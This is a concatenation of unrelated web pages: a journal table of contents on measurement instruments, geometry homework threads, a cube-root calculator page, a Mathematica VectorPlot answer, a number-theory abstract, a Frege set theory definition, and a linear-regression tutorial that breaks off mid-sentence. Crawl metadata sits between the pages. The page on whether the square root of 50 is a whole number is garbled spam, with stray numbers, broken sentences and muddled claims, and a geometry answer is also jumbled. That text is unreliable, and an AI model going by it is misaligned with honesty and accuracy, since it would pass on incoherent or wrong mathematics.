MScMS Publication Year: 2010, Page(s):110 - 121 Cited by:  Papers (9) | |PDF (2597 KB) The Mobile Spatial coordinate Measuring System (MScMS) is a distributed wireless-sensor-network-based system used to perform dimensional measurements of large-scale objects. The system consists of a wireless mobile probe with ultrasonic (US) transceivers, the position of which is determined using a distributed constellation of US transceivers arranged around the measuring area. These US transceive... View full abstract» • ### Pileup Correction Algorithms for Very-High-Count-Rate Gamma-Ray Spectrometry With NaI(Tl) Detectors Publication Year: 2010, Page(s):122 - 130 Cited by:  Papers (15)  |  Patents (3) | |PDF (527 KB) | HTML In this paper, we propose algorithms that are suitable for gamma-ray spectrometric systems with Nal(Tl) detector that support pileup correction at extremely high count rates of 4 ?? 106 pulses/s. The following two algorithms are presented: 1) an algorithm based on modified phase-only correlation (MPOC) for the detection of the beginning of pulses and maximum likelihood estimation (MLE) ... View full abstract» • ### Prestiction Friction Modeling and Position Control in an Actuated Rotary Arm Publication Year: 2010, Page(s):131 - 139 Cited by:  Papers (6) | |PDF (606 KB) | HTML In this paper, using experiment and theory, we study the dynamic characteristics of a rotary single-link arm in free motion when the effect of hub friction is significant. Our objective is to identify the important phenomena that affect the system using an adequate friction model. We introduce a friction regime, called ??prestiction,?? and a friction model for capturing this regime. Comparisons ar... View full abstract» • ### A New Method for Measuring the Level Dependence of AC Shunts Publication Year: 2010, Page(s):140 - 144 Cited by:  Papers (8) | |PDF (246 KB) | HTML We report on a new method for the measurement of the level dependence of the AC-DC difference of current shunts. The method is based on the use of a binary inductive current divider. A method to compare two AC shunts at common ground is described. Measurement results on two 1-A AC shunts, which consist of different numbers of resistors, indicate that the level dependence between 0.5 and 1 A is les... View full abstract» • ### Calibrating an Arbitrary Test Fixture for a Symmetric Device by Three Measurements Publication Year: 2010, Page(s):145 - 152 Cited by:  Papers (5) | |PDF (890 KB) | HTML In this paper, a general solution of calibrating a microwave test fixture for a symmetric device is deduced from the cascading network relation, and it exposes the probability and condition of calibrating an arbitrary test fixture for a symmetric device by three measurements, which is less than the times of measurements in the thru-reflect-line (TRL) method. The scattering parameters of the test f... View full abstract» • ### Monitoring Water Levels and Currents Using Reflected GPS Carrier Doppler Measurements and Coordinate Rotation Model Publication Year: 2010, Page(s):153 - 163 Cited by:  Papers (5) | |PDF (1260 KB) | HTML This paper describes the development and application of a highly integrated Global Positioning System (GPS) receiver that employs reflected GPS signals to measure the floodwater levels, sea levels, and soil moisture of riverbeds. Both right- and left-hand circular polarization antennas are employed to simultaneously obtain direct and reflected signals. The objective of this paper is to use the car... View full abstract» • ### Ultrasonic Measurement of Fine Head Movements in a Standard Ophthalmic Headrest Publication Year: 2010, Page(s):164 - 170 Cited by:  Papers (12) | |PDF (410 KB) | HTML We aimed to investigate the naturally occurring horizontal plane movements of a head stabilized in a standard ophthalmic headrest and to analyze their magnitude, velocity, spectral characteristics, and correlation to the cardio pulmonary system. Two custom-made air-coupled highly accurate (??2 ??m) ultrasound transducers were used to measure the displacements of the head in different horizontal di... View full abstract» • ### Reputation-Enabled Self-Modification for Target Sensing in Wireless Sensor Networks Publication Year: 2010, Page(s):171 - 179 Cited by:  Papers (19) | |PDF (255 KB) | HTML Wireless sensor networks provide new tools for sensing physical environments. However, the general existence of faulty sensor measurements in networks will cause degradation of the network service quality and huge burden of the precious energy. While cryptography-based approaches are helpless of information generation, reputation systems are demonstrated of positive results. In this paper, we inve... View full abstract» • ### Harmonic Power Standard at NIM and Its Compensation Algorithm Publication Year: 2010, Page(s):180 - 187 Cited by:  Papers (16) | |PDF (261 KB) | HTML A new harmonic power standard has been developed at the National Institute of Metrology (NIM), Beijing, China, for the calibration of harmonic power analyzers under nonsinusoidal conditions at fundamental frequencies of 50 and 60 Hz. The standard is based on digital sampling techniques that do not require synchronization. A compensation algorithm is presented in this paper. A new definition of the... View full abstract» • ### A Very Low Offset Preamplifier for Voltage Measurements in the $muhbox{V}$ Range Publication Year: 2010, Page(s):188 - 194 Cited by:  Papers (2) | |PDF (247 KB) | HTML A new topology for the implementation of a very low offset voltage preamplifier is presented. The new topology employs a time-varying resistance as a probe for detecting the sign and magnitude of the equivalent input offset of an operational amplifier in a series-shunt feedback configuration and allows for continuously correcting the offset voltage by means of a proper control feedback. The most r... View full abstract» ## Aims & Scope Papers are sought that address innovative solutions to the development and use of electrical and electronic instruments and equipment to measure, monitor and/or record physical phenomena for the purpose of advancing measurement science, methods, functionality and applications. Full Aims & Scope Editor-in-Chief
2018-02-23 08:22:35
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.17795713245868683, "perplexity": 5710.1933222238}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-09/segments/1518891814538.66/warc/CC-MAIN-20180223075134-20180223095134-00533.warc.gz"}
https://www.jiskha.com/questions/971840/prove-the-statement-angle-abd-is-a-right-angle-and-angle-cbe-is-a-right-angle-and-prove
# Geomentry prove the statement Angle ABD is a right angle and Angle CBE is a Right Angle and prove Angle ABC is Congruent to Angle DBE 1. 👍 2. 👎 3. 👁 1. Without a diagram, we have no idea what the letters mean. 1. 👍 2. 👎 2. Because it is given that q ║ r and r ║ s, then q ║ s by .... 11) GIVEN: n || m, ∠1 ≅ ∠2. PROVE: p || r. Statements. Reasons. 1) n || m. 1. ... 13) Write a paragraph proof. Given: ,. ,. a b a. b m. ⊥. ⊥. Prove: m. PROOF: a ll b and a f l .... PROOF: SINCE WE ARE GIVEN THAT a ll c and b ll c, then a ll b by the TRANSITIVE. 1. 👍 2. 👎 ## Similar Questions 1. ### Geometry Help! I'm so confused :( 1. Supply the missing reasons to complete the proof. Given: angle Q is congruent to angle T and line QR is congruent to line TR Prove: line PR is congruent to line SR Statement | Proof 1. angle Q is 2. ### Math In trapezoid $ABCD$, $\overline{BC} \parallel \overline{AD}$, $\angle ABD = 105^\circ$, $\angle A = 43^\circ$, and $\angle C = 141^\circ$. Find $\angle CBD$, in degrees. 3. ### Geometry Complete the two column proof. Given: angle 2 and angle 5 are supplementary Prove: l is parallel to m Statements: 1. BLANK 2. angle 3 is congruent to angle 2 3. angle 3 and angle 5 are supplementary 4. BLANK Reasons: 1.________ 4. ### Math Name a pair of complementary angles. (1 point) angle sign1 and angle sign4 angle sign1 and angle sign2 .. angle sign3 and angle sign4 angle sign1 and angle sign6 1. ### geometry if segment bd bisects angle abc. the measure of angle abc=7x. the measure of angle abd=3x+25 find the measure of angle dbc 2. ### Geometry line BD bisects angle ABC. Find angle ABD, angle CBD, and angle ABC if angle ABD equals 3x+6 and angle DBC equals 7x-18 please help it would mean a lot 3. ### Geometry Ray BD bisects angle ABC. Find angle ABD if angle ABD = (6x+4) degrees and angle DBC = (8x-4) degrees 4. ### geometry line BD bisects angle ABC. Solve for X and find the measures of angle ABC. angle ABD= 5X, angle DBC= 3X + 10 I don't really understand this question so can someone please help me solve this and explain to me how they solved it/ 1. ### Geometric Proofs Given: line AB is congruent to line AC, Angle BAD is congruent to angle CAD. Prove: line AD bisects BC Picture: An upside down triangle divided inhalf to form two triangles Angle BAD and angle CAD. They share a common side of AD. 2. ### math in triangle ABC angle B =90 and BD PERPENDICULAR AC proof that angle ABD =angle ACB 3. ### Geometry Write a two column proof. Given: angle STV is congruent to angle TVU, angle STU is congruent to angle UVS. Prove: Angle SVT is congruent to angle UTV. 4. ### Maths Two chords AB and CD of A circle intersect at right angle at a point inside the circle if m(angle BAC is 35 degree find m(angle ABD)
2021-01-20 03:22:53
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6607683300971985, "perplexity": 4726.9628467374105}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-04/segments/1610703519883.54/warc/CC-MAIN-20210120023125-20210120053125-00103.warc.gz"}
https://www.snapxam.com/calculators/equations-with-cubic-roots-calculator
# Equations with cubic roots Calculator ## Get detailed solutions to your math problems with our Equations with cubic roots step-by-step calculator. Practice your math skills and learn step by step with our math solver. Check out all of our online calculators here! Go! 1 2 3 4 5 6 7 8 9 0 a b c d f g m n u v w x y z (◻) + - × ◻/◻ / ÷ 2 e π ln log log lim d/dx Dx |◻| = > < >= <= sin cos tan cot sec csc asin acos atan acot asec acsc sinh cosh tanh coth sech csch asinh acosh atanh acoth asech acsch ### Difficult Problems 1 Solved example of equations with cubic roots $y=\left(2^{\frac{1}{3}}\right)^2$ 2 Dividir $1$ entre $3$ $y=\left(\sqrt[3]{2}\right)^2$ 3 Calcular la potencia $1.2599^2$ $y=1.5874$ ### Struggling with math? Access detailed step by step solutions to millions of problems, growing every day!
2019-11-13 21:53:54
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6487900614738464, "perplexity": 4241.656915950754}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-47/segments/1573496667442.36/warc/CC-MAIN-20191113215021-20191114003021-00331.warc.gz"}
http://openstudy.com/updates/510490eee4b0ad57a5632de5
## A community for students. Sign up today Here's the question you clicked on: ## kris2685 3 years ago translate to an algebraic expression . the sum of D and F • This Question is Closed 1. UnkleRhaukus D+F 2. moser90 F + D think we need more info to help 3. moser90 so then it would be D+F 4. TeemoTheTerific d+f 5. UnkleRhaukus $\sum\times D\land F$ 6. lake33 The ? Was what is the sum of d and f that was all. #### Ask your own question Sign Up Find more explanations on OpenStudy Privacy Policy
2016-02-08 14:36:27
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5104389786720276, "perplexity": 6489.518760817946}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-07/segments/1454701153585.76/warc/CC-MAIN-20160205193913-00116-ip-10-236-182-209.ec2.internal.warc.gz"}
https://mylifecoach.uk/496ga7a/157367-is-the-square-root-of-50-a-whole-number
# is the square root of 50 a whole number The perfect squares are the squares of the whole numbers: 1, 4, 9, 16, 25, 36, 49, 64, 81, 100 … The square root of a number, n, written . What would happen if $\sqrt{}$ instead meant the negative square root? How to find the square root of a number. STEP 6: Subtract Again. The square root of 49 is 7 and the square room of 64 is 8, so all of the number between 49 and 64 have a square root that is a decimal between 7 and 8. Is it wrong to say that $100$ is solution of $\sqrt x+10=0$? At first glance, this would appear to be so, because the poster's example finds the square root of the two digit whole number 20 instead of the article's example of 645. For example, 4 has two square roots: 2 and -2. 5.858585858 63.4 square root 21 square root 36 2. However, I actually worked out the article's example (square root of 645) using both methods and found that the Babylonian Method required 9 "cycles of divide and average" to arrive at the answer. Natural (Counting) Numbers: Whole Numbers: Natural Numbers and . It is the second digit in the root. Which is equal to the square root of 1 over the square root of 100, which is equal to 1/10, or 0.1. Go here for the next problem on our list. 1. (a) Does the square root of the number 40 lie between the 6 and 7? Many square roots of numbers turn out to be irrational roots, that is irrational numbers. We have the square root of 0.01. Let's do J. 23 1 over 4 square root 27 3.402538 3. For example: 16 divided by 4 is 4. Prime Factors can help determine if a number will have a square root that is rational or irrational. And they are all whole numbers. Thus, a = 8 and b = 9. It is an irrational number, but you can simplify it or find rational approximations for it.. First note that #50 = 2 xx 5 xx 5# contains a square factor #5^2#.We can use this to simplify the square root: #sqrt(50) = sqrt(5^2*2) = sqrt(5^2)*sqrt(2) = 5 sqrt(2)# Here are the square roots of all the perfect squares from 1 to 100. Examples. For the numbers above, the square root was equal to an integer. Can the square root of a real number be negative? A number is a perfect square when you can directly extract its square root in whole numbers and without approximation. Edited February 2, 2007 by BALA The reason the square root of 0.2003 is greater than 0.2003 is because when you take the square root of the dividend (√2003), the decrease of the dividend is smaller than the decrease of the divisor when you take the square root of the divisor (√10000). Square Root Table: In mathematics, the square of a number refers to the value which we get after multiplying the same number by itself (Y × Y = X). If the square root of an integer is another integer then the square is called a perfect square. The good news is that the square root of a whole number is rational precisely when it is an integer. it is not always possible to get the square root as an integer. Determine the Type of Number square root of 49. Simplifying the square root of a whole number. 1. ... Square root of whole number number of solutions. However, for numbers that aren't perfect squares, you'll have to use a method that involves estimation (or you can use a table of square and square roots). Calculating square roots and n th roots is fairly intensive. All whole numbers lie to the right of the zero on the number line. 55. 2. We will find a whole number bigger than the square root of 102 and a whole number smaller than the square root of 102. To take the square root of a number, press [2ND] (the secondary function key) and then [√ ] (the radical symbol key which is used to take the square root of a number) and then the number that you want to find the square root of and then the [ENTER] key.Example: To find the square root of 2, push: [2ND] [√ ] 2 [ENTER] This will give you the answer of: 1.414213562 if done correctly. A perfect square root is where the square root of a number equals another whole number. Subtract the product we calculated (which is 425) from the current number on the left (also 425). i.e., the square root of 4 is √4=2 which when multiplied by itself gives the original definite number 4. The square root of 17 is between 4 and 5. Example: 1 - 1 4 - 2 9 - 3 16 - 4... up to 961 - 31...Which is the last square root before 1000. They are all integers, which means they do not have decimal points or fractions. This is an online chart which consists of a list of square root values for numbers 1 to 100. The square root of #50# is not a whole number, or even a rational number. But I’ll bite. Here, the square root of X (√X) refers to Y.Every non-negative number such as 1,2,3,4,5,…, etc., can have a non-negative square root such as √4=2,√9=3,√16=4, etc.The square root lists can be written in a table. Suppose, x is the square root of y, then it is represented as x=√y or we can express the same equation as x 2 = y. Here,’√’is the radical symbol used to represent the root of numbers. Integers: Rational Numbers: Integers, Fractions, and Terminating or Repeating Decimals. Find the square root of 56.25, without using long division method? Note that the term "radicand" refers to the number for which the root is to be determined. For example 25 is a perfect square since $$\pm \sqrt{25}= \pm 5$$ If the radicand is not a perfect square i.e. This would not be the case if the whole number in front of the decimal point wasn't 0. These are equivalent statements, but both of them are irrational. is the number that gives n when multiplied by itself. I need to Output the results of square root just for the whole numbers. You could also use you calculate and hit the square root key and then type 51 and see what decimal you get: about 7.1, which is between 7 and 8. Some common roots include the square root, where n = 2, and the cubed root, where n = 3. Of whole number smaller than the square root is where the square root the. Estimating a root or Non Repeating Decimals was n't 0, the square root is to be.! Is irrational numbers: integers, which on multiplied by itself not every square root for! Reasonable guess ( approximate root ) for the square root as an integer 5. Number under the root is 5, since 5 x 5 is equal to 1/10, or even a number... Real whole numbers as answers rational or irrational same thing as the square root of a whole number in of... The original number is 12 root of a real number when multiplied itself! Numbers above, the square of 17 is between 4 and 5 by 4 is √4=2 which multiplied! Square when you can find whole numbers ( i.e ( Counting ) numbers natural. Root, where n = a. Estimating a root radical sign, you may get a number! Root 36 2 in equation format: n √ a = 8 the! Top right corner square when you subject a certain number to a radical sign, you directly... What we need without approximation 50 # is not always possible to get the square root of 144 is.... Repeating Decimals top right corner results of square root of 17 to be 4.1 for example use! Negative square root of 56.25, without using long division method roots of the... Root just for the next problem on our list a reasonable guess approximate. ( approximate root ) for the numbers above, the square root of.... The negative square root of 102 rational number I got some good news and. Squares ) is called a perfect square when you can directly extract its square root is number which a... A^2 < 78 < b^2 may get a real number be negative is 2, and so on news that... Roots since a square is called a perfect square root 27 3.402538 3 is solution of $\sqrt$. Even a rational number can the square root lie between the 6 and 7 root 36 2 is called perfect... Over 4 square root 27 3.402538 3 of 144 is 12 example, because 10 10. Of computing square roots since a square root is 5, since 5 x 5 is equal zero. As the square root 36 2 50 # is not a whole number irrational number, or even a number. 23 1 over the square roots estimate the square root of 17 to be determined squares 1. Can help determine if a number means they do not have decimal points or Fractions to radical! 16 divided by 2 is the same thing as the square roots since a square of... The numbers above, not every square root of a number will have a square root whole. 102 and a whole number number of solutions # is not always possible to get the of... A < sqrt ( 78 ) < b square when you subject a certain number to radical. Which means they do not have decimal points or Fractions and without approximation you take an irrational number, it!: 16 divided by 4 is 4, we can just consider
2022-10-02 01:06:52
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.810404360294342, "perplexity": 267.32256366361435}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00764.warc.gz"}
https://mathematica.stackexchange.com/questions/149596/problems-evaluating-a-simple-vectorial-field-with-vectorplot
# Problems evaluating a simple vectorial field with VectorPlot [duplicate] I'm trying to plot the electrostatic field generated from a single charge on a plane. Without the $\frac{1}{4\pi\varepsilon_0}$ factor and the value of the charge $q$, as a function of $x, y$ the electric field is $$\vec{E}(\vec{r})\equiv\vec{E}(x,y) = \frac{\vec{r}}{|\vec{r}|^3}\equiv\begin{cases}\frac{x}{(x^2+y^2)^{\frac{3}{2}}}\\ \frac{y}{(x^2+y^2)^{\frac{3}{2}}}\end{cases}$$ I thought the best way to plot this plane field was the function VectorPlot. Here is the code I entered and the output result VectorPlot[{x/((x^2 + y^2)^(3/2)), y/((x^2 + y^2)^(3/2))}, {x, -1, 1}, {y, -1, 1}] I tried to change x_min\x_max and y_min\y_max but I got the same outcome. Why is it plotting only one vector? What am I missing? I then decided to look at the StreamDensityPlot: StreamDensityPlot[{x/((x^2 + y^2)^(3/2)), y/((x^2 + y^2)^(3/2))}, {x, -1, 1}, {y, -1, 1}, ColorFunction -> "Rainbow"] Now I'm a little bit confused on the use of these two plotting function, as on the mathematica documentation online it uses only simple vectorial fields such as $f(x,y) = (x,y)$ and everything looks so cool, but when I approach the basic vectorial field of physics I get only terrible results. Any ideas? • another possibility is StreamPlot, which is thought to show the direction of the field in each point, regardless of its intensity – glS Jul 3, 2017 at 14:27 VectorScale can be used to take control of the amplitude. f[x_, y_] := {x/(x^2 + y^2)^(3/2), y/(x^2 + y^2)^(3/2)} When close to the origin, set the Norm of the vector (argument #5) to None. You may want to tweak the value, I used the radius of 0.2 corresponding to Norm[f[0.2, .2]] 12.5 Implementing this in VectorPlot VectorPlot[f[x, y], {x, -1, 1}, {y, -1, 1}, VectorScale -> {Automatic, Automatic, Function[If[#5 > 12.5, None, #5]] }]
2022-07-01 23:25:58
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.30627521872520447, "perplexity": 890.7437989324919}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-27/segments/1656103947269.55/warc/CC-MAIN-20220701220150-20220702010150-00305.warc.gz"}
https://www.impan.pl/pl/wydawnictwa/czasopisma-i-serie-wydawnicze/colloquium-mathematicum/online/114226/explicit-averages-of-square-free-supported-functions-to-the-edge-of-the-convolution-method
# Wydawnictwa / Czasopisma IMPAN / Colloquium Mathematicum / Artykuły Online First ## Explicit averages of square-free supported functions: to the edge of the convolution method Colloquium Mathematicum MSC: Primary 11N37; Secondary 11A25, 11A41. DOI: 10.4064/cm8337-11-2020 Opublikowany online: 14 June 2021 #### Streszczenie We give a general statement of the convolution method so that one can provide explicit asymptotic estimations for all averages of square-free supported arithmetic functions that have a sufficiently regular behavior on the prime numbers and observe how the nature of this method gives error estimations of order $X^{-\delta }$, where $\delta$ belongs to an open set $I$ of positive reals. In order to have a better error estimation, a natural question is whether or not we can achieve an error term of critical order $X^{-\delta _0}$, where $\delta _0$, the critical exponent, is the right endpoint of $I$. We answer this in the affirmative by presenting a new method that improves qualitatively almost all instances of the convolution method under some regularity conditions; now, the asymptotic estimation of averages of well-behaved square-free supported arithmetic functions can be given with its critical exponent and a reasonable explicit error constant. We illustrate this new method by analyzing a particular average related to the work of Ramaré–Akhilesh (2017), which leads to notable improvements when imposing non-trivial coprimality conditions. #### Autorzy • Sebastian Zuniga AltermanInstitut de Mathématiques de Jussieu Université Paris Diderot P7 Bâtiment Sophie Germain, 8 Place Aurélie Nemours 75013 Paris, France e-mail ## Przeszukaj wydawnictwa IMPAN Zbyt krótkie zapytanie. Wpisz co najmniej 4 znaki. Odśwież obrazek
2021-12-08 19:26:08
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.627153217792511, "perplexity": 1582.6493549863724}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964363520.30/warc/CC-MAIN-20211208175210-20211208205210-00347.warc.gz"}
https://www.proofwiki.org/wiki/Definition:Frege_Set_Theory
# Definition:Frege Set Theory ## Definition The Frege system of set theory is a system of axiomatic set theory which has as its sole axiom the comprehension principle: Given any property $P$, there exists a unique set which consists of all and only those objects which have property $P$: $\set {x: \map P x}$ In support of this, the various logical axioms supporting predicate logic also hold. It is accepted that the above statement lacks clarity, but the field of symbolic logic was less well understood when this system was first defined. ## Also see • Results about Frege set theory can be found here. ## Source of Name This entry was named for Gottlob Frege.
2022-08-12 03:52:30
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7524670958518982, "perplexity": 883.134134343431}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571538.36/warc/CC-MAIN-20220812014923-20220812044923-00382.warc.gz"}
https://chunml.github.io/ChunML.github.io/tutorial/Underfit-Overfit/
# Machine Learning Part 5: Underfitting and Overfitting Problems Here we are again, in the fifth post of Machine Learning tutorial series. Today I will talk about two common problems you may face in Machine Learning: Underfitting and Overfitting. Wait! There is something wrong, isn’t it? - You may wonder… Of course I remember promising you in the previous post, that today I will dig deeper into Linear Regression, and together we will do some coding. Actually, I intended to name today’s post “Implementing Linear Regression” or something, but I soon realized that it would be inappropriate. Good news is today’s post will mainly focus on implementation of Linear Regression, and what we can do to improve the quality of the Model. By doing that, I am actually leading you to go into some concept which is more general, and can be applied not only in Linear Regression, but every spot which Machine Learning takes place. That is enough of talking. First, let’s get our hands dirty. If you went through my previous post, you would now have everything set up. But if you didn’t, you might want to take a look at it here: Setting Up Python Environment. ### Implementing Linear Regression Open Terminal and go into Python console mode: Now let’s import sklearn module for Linear Regression. sklearn is a shortname of scikit-learn, a great Python library for Machine Learning. We are not using only LinearRegression. We will work with arrays, so here I also imported numpy for dealing with arrays. We will also draw some graphs to visualize the data, so that’s why I imported pyplot, a great module for graph drawing. Remember the data I used in the previous post on Linear Regression? I will show it right below for you: X y 1 7 2 8 3 7 4 13 5 16 6 15 7 19 8 23 9 18 10 21 Now let’s use that to prepare our training data: Nearly every Machine Learning library requires data to be formatted in the way which each row is one training example (or testing example), and each column represents one feature’s data. So we have to reshape our data accordingly. Now let’s plot our training data. You will receive the same figure with the one in the previous post: Next, let’s initialize the Linear Regression model: Then we will train our Model, using the training data above. You can do that by simply calling the fit function, which takes feature matrix $$X$$ and label vector $$y$$ as parameters: Our training data is quite simple, so the learning process finished so fast as if it never happened. All the change during training (like weights and bias), was stored in the model object. Let’s see what we got: Obviously, you can get more information through other attributes of model object, but now we will only focus on coef_, which stores the weight parameter, and intercept_, which stores the bias parameter. Next, let’s compute the prediction vector a, using the obtained weight and bias: Now let’s draw all $$X$$, $$y$$ and $$a$$ on the same plot. Here we got a straight line, which fit the data better than what we did before (which is easy to understand, since we only went through 4 iterations). So simple, right? Just a few lines of code, we have just prepared our training data, trained our Model, and visualized the result we got! Yeah, scikit-learn helps us do all the heavy things. In later posts, you will see that it can even handle more complicated jobs. ### Improving the performance of Linear Regression Obviously, we can see that the straight line above fits pretty well, but not good enough. And we need a more suitable approach. But first, let’s evaluate how well the Model is performing numerically, by computing the accuracy over the training data: We cannot always evaluate something just by seeing it, right? We need something which is more concrete, yeah, a number. By looking at numbers, we will have a better look, and easily compare different things. scikit-learn provides us the score function, whose parameters are similar to the fit function. And you can see that, our Model now has the accuracy of 85% over the training data. Commonly, we demand a higher accuracy, let’s say 90% or 95%. So by looking at the current accuracy, we can tell that our Model is not performing as we are expecting. So let’s think about an improvement. But how can we do that? Remember I told you about Features in the first Post? Features are something we use to distinguish one object from others. So obviously, if we have more Features, then we will likely have a better fit model, since it can receive more necessary information for training. But how we can acquire more Features? #### Polynomial Features The easiest way to add more Features, is to computing polynomial features from the provided features. It means that if we have $$X$$, then we can use $$X^2$$, $$X^3$$, etc as additional features. So let’s use this approach and 